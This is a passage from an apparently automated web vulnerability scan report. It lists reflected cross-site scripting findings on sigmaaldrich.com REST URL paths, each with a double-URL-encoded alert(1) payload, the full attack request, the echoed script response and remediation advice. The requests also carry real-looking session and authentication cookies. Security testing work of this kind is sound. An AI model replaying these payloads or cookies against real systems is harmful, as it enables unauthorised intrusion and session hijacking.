User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:16 GMT
Content-Length: 28999
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/docs/Sigma/General_Information94f63";alert(1)//aa7b8fef9ea/asms2006prot20.Par.0001.File.tmp/asms2006prot20.pdf","E404") ;
   </script>
...[SNIP]...

1.302. http://www.sigmaaldrich.com/etc/medialib/docs/Sigma/General_Information/asms2006prot20.Par.0001.File.tmp/asms2006prot20.pdf [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Sigma/General_Information/asms2006prot20.Par.0001.File.tmp/asms2006prot20.pdf

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 95130%2522%253balert%25281%2529%252f%252fcc7e9faffd3 was submitted in the REST URL parameter 6. This input was echoed as 95130";alert(1)//cc7e9faffd3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 6 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/docs/Sigma/General_Information/95130%2522%253balert%25281%2529%252f%252fcc7e9faffd3/asms2006prot20.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:21 GMT
Content-Length: 28967
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/docs/Sigma/General_Information/95130";alert(1)//cc7e9faffd3/asms2006prot20.pdf","E404") ;
   </script>
...[SNIP]...

1.303. http://www.sigmaaldrich.com/etc/medialib/docs/Sigma/General_Information/cresswellccex.Par.0001.File.tmp/cresswellccex.pdf [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Sigma/General_Information/cresswellccex.Par.0001.File.tmp/cresswellccex.pdf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b5190%2522%253balert%25281%2529%252f%252f5d79623930a was submitted in the REST URL parameter 1. This input was echoed as b5190";alert(1)//5d79623930a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etcb5190%2522%253balert%25281%2529%252f%252f5d79623930a/medialib/docs/Sigma/General_Information/cresswellccex.Par.0001.File.tmp/cresswellccex.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:55 GMT
Content-Length: 28997
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etcb5190";alert(1)//5d79623930a/medialib/docs/Sigma/General_Information/cresswellccex.Par.0001.File.tmp/cresswellccex.pdf","E404") ;
   </script>
...[SNIP]...

1.304. http://www.sigmaaldrich.com/etc/medialib/docs/Sigma/General_Information/cresswellccex.Par.0001.File.tmp/cresswellccex.pdf [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Sigma/General_Information/cresswellccex.Par.0001.File.tmp/cresswellccex.pdf

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2735b%2522%253balert%25281%2529%252f%252f129d946f346 was submitted in the REST URL parameter 2. This input was echoed as 2735b";alert(1)//129d946f346 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib2735b%2522%253balert%25281%2529%252f%252f129d946f346/docs/Sigma/General_Information/cresswellccex.Par.0001.File.tmp/cresswellccex.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:02 GMT
Content-Length: 28997
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib2735b";alert(1)//129d946f346/docs/Sigma/General_Information/cresswellccex.Par.0001.File.tmp/cresswellccex.pdf","E404") ;
   </script>
...[SNIP]...

1.305. http://www.sigmaaldrich.com/etc/medialib/docs/Sigma/General_Information/cresswellccex.Par.0001.File.tmp/cresswellccex.pdf [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Sigma/General_Information/cresswellccex.Par.0001.File.tmp/cresswellccex.pdf

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 555c4%2522%253balert%25281%2529%252f%252fa9d6c55d4af was submitted in the REST URL parameter 3. This input was echoed as 555c4";alert(1)//a9d6c55d4af in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/docs555c4%2522%253balert%25281%2529%252f%252fa9d6c55d4af/Sigma/General_Information/cresswellccex.Par.0001.File.tmp/cresswellccex.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:07 GMT
Content-Length: 28997
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/docs555c4";alert(1)//a9d6c55d4af/Sigma/General_Information/cresswellccex.Par.0001.File.tmp/cresswellccex.pdf","E404") ;
   </script>
...[SNIP]...

1.306. http://www.sigmaaldrich.com/etc/medialib/docs/Sigma/General_Information/cresswellccex.Par.0001.File.tmp/cresswellccex.pdf [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Sigma/General_Information/cresswellccex.Par.0001.File.tmp/cresswellccex.pdf

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 26b0f%2522%253balert%25281%2529%252f%252f9cc5826e82d was submitted in the REST URL parameter 4. This input was echoed as 26b0f";alert(1)//9cc5826e82d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/docs/Sigma26b0f%2522%253balert%25281%2529%252f%252f9cc5826e82d/General_Information/cresswellccex.Par.0001.File.tmp/cresswellccex.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
